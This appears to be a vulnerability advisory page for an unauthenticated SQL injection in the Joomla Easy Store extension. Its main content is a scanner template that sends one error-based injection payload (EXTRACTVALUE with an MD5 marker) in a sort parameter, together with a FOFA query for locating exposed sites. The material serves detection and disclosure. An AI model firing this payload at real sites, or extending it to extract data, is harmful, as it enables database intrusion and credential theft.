CVE-2026-65761: Joomla Easy Store - SQL Injection

2026-08-26 Joomla Easy Store PoC Public

Description

Joomla Easy Store extension 1.0.0-2.0.1 contains an unauthenticated SQL injection caused by improper validation of order parameters, letting unauthenticated attackers read the full database including credentials and sessions.

PoC

id: CVE-2026-65761

info:
  name: Joomla Easy Store - SQL Injection
  author: YesWeHack
  severity: critical
  description: |
    Joomla Easy Store extension 1.0.0-2.0.1 contains an unauthenticated SQL injection caused by improper validation of order parameters, letting unauthenticated attackers read the full database including credentials and sessions.
  impact: |
    Unauthenticated attackers can read the entire database, exposing sensitive data including credentials and session information.
  remediation: |
    Update to the latest version of Easy Store extension.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-65761
    - https://mysites.guru/blog/easystore-security-disclosure/
    - https://www.joomshaper.com/easystore
  classification:
    cve-id: CVE-2026-65761
    epss-score: 0.00928
    epss-percentile: 0.58771
    cwe-id: CWE-89
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cpe: cpe:2.3:a:joomshaper.com:easy_store_extension_for_joomla:*:*:*:*:*:*:*:*
  metadata:
    max-requests: 1
    vendor: JoomShaper
    product: Easy Store
    fofa-query: app="joomla" && body="Easy Store"
  tags: cve,cve2026,joomla,easystore,sql-injection,unauthenticated

variables:
  num: "999999999"

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_easystore&view=products&task=search&filter_sortby=created-ASC,EXTRACTVALUE(1,CONCAT(CHAR(126),SUBSTRING(MD5({{num}}),1,28)))--+-"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 500'
          - 'contains_all(body, substr(md5(num), 0, 28), "XPATH syntax error")'
        condition: and
# digest: 4a0a00473045022100e089651f2c35add5aef018ea4bb1cf5cab5a2c72ad9e6ed4f477570de86057a602207dd7230a8ec54cf55446b872b3756f7a634d9741404ae164936884c948ba813a:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities